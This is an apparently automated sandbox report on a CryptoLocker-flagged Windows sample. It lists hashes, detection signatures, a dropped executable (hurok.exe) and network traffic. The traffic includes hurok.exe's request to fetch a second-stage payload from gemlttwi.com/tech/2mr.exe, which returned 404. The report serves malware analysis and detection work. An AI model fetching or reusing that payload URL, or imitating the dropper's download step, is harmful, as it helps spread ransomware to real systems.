Analysis

  • max time kernel
    93s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30/04/2024, 20:12 UTC

General

  • Target

    2024-04-30_be2b1853ab8dbafe435ee69bd931aa2d_cryptolocker.exe

  • Size

    51KB

  • MD5

    be2b1853ab8dbafe435ee69bd931aa2d

  • SHA1

    59164d95b334a70846afd684d1f7c0f4a7159e7e

  • SHA256

    8f23c7ea0813b5cbc064d5dad2a372639fc92867950bd14d1b664462c886e41b

  • SHA512

    9889d7f774ac7f0fb1c40fb813e62d99f3beef480b24fc26c21a885aa650a906901d738aab900a3daf98859b4265ab9757de1b8ee6210f198803999d3227f8c2

  • SSDEEP

    1536:o1KhxqwtdgI2MyzNORQtOflIwoHNV2XBFV72BOlA7ZszsbKY1xzpAIUr:aq7tdgI2MyzNORQtOflIwoHNV2XBFV7L

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Detection of Cryptolocker Samples 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-04-30_be2b1853ab8dbafe435ee69bd931aa2d_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-04-30_be2b1853ab8dbafe435ee69bd931aa2d_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Users\Admin\AppData\Local\Temp\hurok.exe
      "C:\Users\Admin\AppData\Local\Temp\hurok.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:2556

Network

  • [US]
    DNS
    gemlttwi.com
    hurok.exe
    Remote address:
    8.8.8.8:53
    Request
    gemlttwi.com
    IN A
    Response
    gemlttwi.com
    IN A
    192.185.35.56
  • [US]
    GET
    https://gemlttwi.com/tech/2mr.exe
    hurok.exe
    Remote address:
    192.185.35.56:443
    Request
    GET /tech/2mr.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: gemlttwi.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Tue, 30 Apr 2024 20:12:28 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://gemlttwi.com/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade
    Vary: Accept-Encoding
    X-Endurance-Cache-Level: 2
    X-nginx-cache: WordPress
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • [US]
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • [US]
    DNS
    56.35.185.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.35.185.192.in-addr.arpa
    IN PTR
    Response
    56.35.185.192.in-addr.arpa
    IN PTR
    immacbytes.com
  • [US]
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • [US]
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • [US]
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA; domain=.bing.com; expires=Sun, 25-May-2025 20:12:28 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 221348F076E3495DB434F498AD4EDC88 Ref B: LON04EDGE0816 Ref C: 2024-04-30T20:12:28Z
    date: Tue, 30 Apr 2024 20:12:28 GMT
  • [US]
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA; _EDGE_S=SID=173D948078D06BE7275280F179106A0F
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=HB2uR2yG0RN_eFjvYPyv2h8yb7jWJFl0plY6IVIdYLw; domain=.bing.com; expires=Sun, 25-May-2025 20:12:29 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 9AC53F07B3B64850BD49FDA0F7C4A7EA Ref B: LON04EDGE0816 Ref C: 2024-04-30T20:12:29Z
    date: Tue, 30 Apr 2024 20:12:28 GMT
  • [NL]
    GET
    https://www.bing.com/aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    Remote address:
    23.62.61.89:443
    Request
    GET /aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: C1DB8F5814AD4C899789192A7CC802C7 Ref B: DUS30EDGE0407 Ref C: 2024-04-30T20:12:29Z
    content-length: 0
    date: Tue, 30 Apr 2024 20:12:29 GMT
    set-cookie: _EDGE_S=SID=173D948078D06BE7275280F179106A0F; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=1B755AE45DD5657B2C0D4E955C6E64AA; path=/; httponly; expires=Sun, 25-May-2025 20:12:29 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.553d3e17.1714507948.2fe829bf
  • [US]
    DNS
    11.97.55.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.97.55.23.in-addr.arpa
    IN PTR
    Response
    11.97.55.23.in-addr.arpa
    IN PTR
    a23-55-97-11.deploy.static.akamaitechnologies.com
  • [US]
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73.deploy.static.akamaitechnologies.com
  • [US]
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • [US]
    DNS
    89.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    89.61.62.23.in-addr.arpa
    IN PTR
    Response
    89.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-89.deploy.static.akamaitechnologies.com
  • [US]
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • [NL]
    GET
    https://www.bing.com/th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.89:443
    Request
    GET /th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA; _EDGE_S=SID=173D948078D06BE7275280F179106A0F; MSPTC=HB2uR2yG0RN_eFjvYPyv2h8yb7jWJFl0plY6IVIdYLw; MUIDB=1B755AE45DD5657B2C0D4E955C6E64AA
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1299
    date: Tue, 30 Apr 2024 20:12:31 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.553d3e17.1714507951.2fe82f5a
  • [US]
    DNS
    88.156.103.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.156.103.20.in-addr.arpa
    IN PTR
    Response
  • [US]
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • [US]
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • [US]
    DNS
    219.131.50.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    219.131.50.23.in-addr.arpa
    IN PTR
    Response
    219.131.50.23.in-addr.arpa
    IN PTR
    a23-50-131-219.deploy.static.akamaitechnologies.com
  • [US]
    DNS
    133.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.190.18.2.in-addr.arpa
    IN PTR
    Response
    133.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-133.deploy.static.akamaitechnologies.com
  • [US]
    DNS
    29.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.243.111.52.in-addr.arpa
    IN PTR
    Response
  • 192.185.35.56:443
    https://gemlttwi.com/tech/2mr.exe
    tls, http
    hurok.exe
    4.4kB
    109.0kB
    87
    84

    HTTP Request

    GET https://gemlttwi.com/tech/2mr.exe

    HTTP Response

    404
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    tls, http2
    2.5kB
    9.0kB
    20
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204
  • 23.62.61.89:443
    https://www.bing.com/aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    tls, http2
    1.5kB
    5.4kB
    17
    12

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

    HTTP Response

    200
  • 23.62.61.89:443
    https://www.bing.com/th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.7kB
    6.6kB
    18
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 8.8.8.8:53
    gemlttwi.com
    dns
    hurok.exe
    58 B
    74 B
    1
    1

    DNS Request

    gemlttwi.com

    DNS Response

    192.185.35.56

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    56.35.185.192.in-addr.arpa
    dns
    72 B
    100 B
    1
    1

    DNS Request

    56.35.185.192.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    11.97.55.23.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    11.97.55.23.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    89.61.62.23.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    89.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    88.156.103.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    88.156.103.20.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    219.131.50.23.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    219.131.50.23.in-addr.arpa

  • 8.8.8.8:53
    133.190.18.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    133.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    29.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    29.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\hurok.exe

    Filesize

    51KB

    MD5

    8778a7ea7a885156afa41bf71d8b7a24

    SHA1

    b4d10729d5d652d27479c5449d2bc4c963986e42

    SHA256

    e6d8f3d1812312aba7698b737210094f08231e2e19517b429c26e978ea3c3609

    SHA512

    12ebc51f8d8f0189e7c02a714440becef5b8d202634a49db5a9dec8306928d327bc92b08d9528ee86e03a404d445954821c200accc2e90494ffb5c1bdb1d6a4a

  • memory/2556-25-0x0000000000560000-0x0000000000566000-memory.dmp

    Filesize

    24KB

  • memory/4740-0-0x00000000005B0000-0x00000000005B6000-memory.dmp

    Filesize

    24KB

  • memory/4740-1-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

  • memory/4740-8-0x00000000005B0000-0x00000000005B6000-memory.dmp

    Filesize

    24KB
